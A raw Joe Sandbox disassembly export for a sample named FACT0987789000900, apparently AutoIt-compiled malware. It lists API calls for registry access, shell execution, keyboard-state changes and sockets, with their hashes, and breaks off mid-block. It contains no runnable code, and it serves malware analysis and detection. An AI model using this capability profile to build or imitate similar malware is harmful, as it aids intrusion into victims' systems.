                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                • Opcode ID: 4c2bb2531119a859e4beae60ddedade159ca906e37a01a7cc29ecc023237d13f
                                                                                                                • Instruction ID: ded84df1e84067cab1c0e9bc3cd49076128a242e6ea2be787752f0a921381d62
                                                                                                                • Opcode Fuzzy Hash: 4c2bb2531119a859e4beae60ddedade159ca906e37a01a7cc29ecc023237d13f
                                                                                                                • Instruction Fuzzy Hash: 790186F25002187FE711AB949D89EF7777CE704304F008492B746E2141EA789E889F74
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004F3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F2BF6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharConnectRegistryUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 2595220575-0
                                                                                                                • Opcode ID: 78758dbbd73c0d5f2bf87104501ff435a328b06048ea79a2b5fb1a79f04220f9
                                                                                                                • Instruction ID: a9e20f31435e621032e0726679e667b0fdb625a194958d9fdeaf9442bf609d14
                                                                                                                • Opcode Fuzzy Hash: 78758dbbd73c0d5f2bf87104501ff435a328b06048ea79a2b5fb1a79f04220f9
                                                                                                                • Instruction Fuzzy Hash: D591BF31204205AFCB00EF55C991B6EBBF5FF58318F04881EFA569B291DB78E905DB4A
                                                                                                                APIs
                                                                                                                • __mtinitlocknum.LIBCMT ref: 004BA991
                                                                                                                  • Part of subcall function 004B7D7C: __FF_MSGBANNER.LIBCMT ref: 004B7D91
                                                                                                                  • Part of subcall function 004B7D7C: __NMSG_WRITE.LIBCMT ref: 004B7D98
                                                                                                                  • Part of subcall function 004B7D7C: __malloc_crt.LIBCMT ref: 004B7DB8
                                                                                                                • __lock.LIBCMT ref: 004BA9A4
                                                                                                                • __lock.LIBCMT ref: 004BA9F0
                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00546DE0,00000018,004C5E7B,?,00000000,00000109), ref: 004BAA0C
                                                                                                                • RtlEnterCriticalSection.NTDLL(8000000C), ref: 004BAA29
                                                                                                                • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 004BAA39
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 1422805418-0
                                                                                                                • Opcode ID: 911ce18f95bc41cbd9f8011d70204d6b35af7a39caf57d2cc49b5235dfcde44c
                                                                                                                • Instruction ID: a67235fa32bdd53cd8a3030e6ee3084f94e8643e840e45f9fd04a08468df4113
                                                                                                                • Opcode Fuzzy Hash: 911ce18f95bc41cbd9f8011d70204d6b35af7a39caf57d2cc49b5235dfcde44c
                                                                                                                • Instruction Fuzzy Hash: 9D4127719003019BEB109F69DA447DDBBB0BF19329F10821EE425AB2D1D77C9865CBBA
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 004F8EE4
                                                                                                                • GetDC.USER32(00000000), ref: 004F8EEC
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004F8EF7
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004F8F03
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 004F8F3F
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004F8F50
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004FBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 004F8F8A
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004F8FAA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                • Opcode ID: 459ff27a87b8c40ae7bbae09fa740329061f5ee672bc3a816e90a45633233e47
                                                                                                                • Instruction ID: 9c34ec839d463b8023b6f37cb3a1310f216cd15934069ca49086372a8ee4f87e
                                                                                                                • Opcode Fuzzy Hash: 459ff27a87b8c40ae7bbae09fa740329061f5ee672bc3a816e90a45633233e47
                                                                                                                • Instruction Fuzzy Hash: 39316B72200214BFEB108F50CC4AFEB3BAAEF59715F048065FE099E291DAB99841DB74
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                  • Part of subcall function 004AC6F4: _wcscpy.LIBCMT ref: 004AC717
                                                                                                                • _wcstok.LIBCMT ref: 004E184E
                                                                                                                • _wcscpy.LIBCMT ref: 004E18DD
                                                                                                                • _memset.LIBCMT ref: 004E1910
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                • String ID: X$p2Tl2T
                                                                                                                • API String ID: 774024439-2349115295
                                                                                                                • Opcode ID: dab15e947cb8f33c45d9805a4b47ec59f0ac936cc39925a5467bf43e0c6963b5
                                                                                                                • Instruction ID: a79843ad55529a2b6f51d562b6f343124b5075284d6f76affba3dabdb1845075
                                                                                                                • Opcode Fuzzy Hash: dab15e947cb8f33c45d9805a4b47ec59f0ac936cc39925a5467bf43e0c6963b5
                                                                                                                • Instruction Fuzzy Hash: 8BC181715043409FCB14EF25C991AABBBE4BF85358F00497EF899972A1DB34ED05CB8A
                                                                                                                APIs
                                                                                                                • select.WS2_32 ref: 004E9691
                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 004E969E
                                                                                                                • __WSAFDIsSet.WS2_32(00000000,?), ref: 004E96C8
                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 004E96F8
                                                                                                                • htons.WS2_32(?), ref: 004E97AA
                                                                                                                • inet_ntoa.WS2_32(?), ref: 004E9765
                                                                                                                  • Part of subcall function 004CD2FF: _strlen.LIBCMT ref: 004CD309
                                                                                                                • _strlen.LIBCMT ref: 004E9800
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3480843537-0
                                                                                                                • Opcode ID: f66a89ca172cd754d3a503818dd7d85b4cbce3e7ae8a0721b46d83272b3c251d
                                                                                                                • Instruction ID: b79b320e49a7e7776ab5dda910c461a32e73eadb0573c86fe79a161156883c4c
                                                                                                                • Opcode Fuzzy Hash: f66a89ca172cd754d3a503818dd7d85b4cbce3e7ae8a0721b46d83272b3c251d
                                                                                                                • Instruction Fuzzy Hash: C6810431504240ABC710EF66CC81E6BBBA8EF95718F004A2EF455972E1EB38DD05C7AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df8826694db3e907e6575ab28c9671f889a219c6bc77af8c87ff2c0812a0a68e
                                                                                                                • Instruction ID: cf3cb40e3bb1912231ca68ee0ba40ae8ba778491c716b984d62cca26f21f905f
                                                                                                                • Opcode Fuzzy Hash: df8826694db3e907e6575ab28c9671f889a219c6bc77af8c87ff2c0812a0a68e
                                                                                                                • Instruction Fuzzy Hash: BE718F70900109EFDB08CF98CC49AEFBB74FF9A314F24854AF915A6251D334AA51CFA5
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004F225A
                                                                                                                • _memset.LIBCMT ref: 004F2323
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 004F2368
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                  • Part of subcall function 004AC6F4: _wcscpy.LIBCMT ref: 004AC717
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004F242F
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004F243E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4082843840-2766056989
                                                                                                                • Opcode ID: 4e1e349c778a4e1c80266994cba3c02c2a2fe0f18b5c3ffcdc2a0237e953cb06
                                                                                                                • Instruction ID: cbf02fe6fbd69ab9e2f2f648527c0d4914d4f21fe1cae057f1324c74444079b1
                                                                                                                • Opcode Fuzzy Hash: 4e1e349c778a4e1c80266994cba3c02c2a2fe0f18b5c3ffcdc2a0237e953cb06
                                                                                                                • Instruction Fuzzy Hash: F07191709006199FCF14EFA9C5819AEBBF5FF48314F10846EE955AB391CB78AD40CB98
                                                                                                                APIs
                                                                                                                • GetParent.USER32(00000000), ref: 004D3C02
                                                                                                                • GetKeyboardState.USER32(?), ref: 004D3C17
                                                                                                                • SetKeyboardState.USER32(?), ref: 004D3C78
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004D3CA4
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004D3CC1
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004D3D05
                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004D3D26
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: 9dec8d8397eeb1661cb9d7d1b6fd067dd3d8e22991be22a85a5d4e537a069eb6
                                                                                                                • Instruction ID: 8a6cd1a7f5731e51b8267915da8c9d7ba896a60a0ab92bafdbc709b65e8be73e
                                                                                                                • Opcode Fuzzy Hash: 9dec8d8397eeb1661cb9d7d1b6fd067dd3d8e22991be22a85a5d4e537a069eb6
                                                                                                                • Instruction Fuzzy Hash: 3B513AA15047D53DFB324B248C25B77BFA95B06705F08848BE0C5567C3D29CEE84DB6A
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004F8FE7
                                                                                                                • GetWindowLongW.USER32(013197D0,000000F0), ref: 004F901A
                                                                                                                • GetWindowLongW.USER32(013197D0,000000F0), ref: 004F904F
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004F9081
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004F90AB
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004F90BC
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004F90D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178440468-0
                                                                                                                • Opcode ID: b08a96e237d4c34cf4fc409e0096e4ef791c92ad4bddf40978053855e7dbe0fd
                                                                                                                • Instruction ID: c9e6a2bcbfb64a979a0b96fbe3a21bcbe1ba0fed65e0cb81dab0243c9dc50d14
                                                                                                                • Opcode Fuzzy Hash: b08a96e237d4c34cf4fc409e0096e4ef791c92ad4bddf40978053855e7dbe0fd
                                                                                                                • Instruction Fuzzy Hash: F2313634600218AFDB208F58DC94F6537A5FB5A314F144166F6198F2B1CF75AC44EB59
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004D08F2
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004D0918
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004D091B
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004D0939
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004D0942
                                                                                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 004D0967
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004D0975
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: 3670982dec37d5b656c0b93368f1a3ee16b49ef5e59a22f01e3d0b323f2dec48
                                                                                                                • Instruction ID: 3c773899c6001c1fe96da1d72d3cff1f65064ae04bf9ecc2500242baf7c8e536
                                                                                                                • Opcode Fuzzy Hash: 3670982dec37d5b656c0b93368f1a3ee16b49ef5e59a22f01e3d0b323f2dec48
                                                                                                                • Instruction Fuzzy Hash: 8721A676600208BF9B109FA8DC94EEB73BCEB19360B008127F905DB351D6B4EC499768
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                • Opcode ID: 1644a110155d4de6b1ef635cd8ae0c37b52a6a9f5fc2929c5f0717c92b2b01de
                                                                                                                • Instruction ID: 544b4609dc9d73db96697692aa43e8f8432abe7815fb0a8bc7f1886fb71050d6
                                                                                                                • Opcode Fuzzy Hash: 1644a110155d4de6b1ef635cd8ae0c37b52a6a9f5fc2929c5f0717c92b2b01de
                                                                                                                • Instruction Fuzzy Hash: A721283210452176C321E625AE32EA773A8EF76308F50402FF846A7382E79D994283AD
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004D09CB
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004D09F1
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 004D09F4
                                                                                                                • SysAllocString.OLEAUT32 ref: 004D0A15
                                                                                                                • SysFreeString.OLEAUT32 ref: 004D0A1E
                                                                                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 004D0A38
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004D0A46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: 7fd32a68565bfa1730695512acc09c3559e28cb6e261bf4864e155878aa81796
                                                                                                                • Instruction ID: 44a6f8088c9e2442a6f623f4cc686e2adcb05951b67e1486cd1951af2ae3c474
                                                                                                                • Opcode Fuzzy Hash: 7fd32a68565bfa1730695512acc09c3559e28cb6e261bf4864e155878aa81796
                                                                                                                • Instruction Fuzzy Hash: 3A214475600204AFDB109FA8DC99DAB77ECEF19360B408127F909CB365D6B4EC459768
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004AD1BA
                                                                                                                  • Part of subcall function 004AD17C: GetStockObject.GDI32(00000011), ref: 004AD1CE
                                                                                                                  • Part of subcall function 004AD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 004AD1D8
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004FA32D
                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004FA33A
                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004FA345
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004FA354
                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004FA360
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
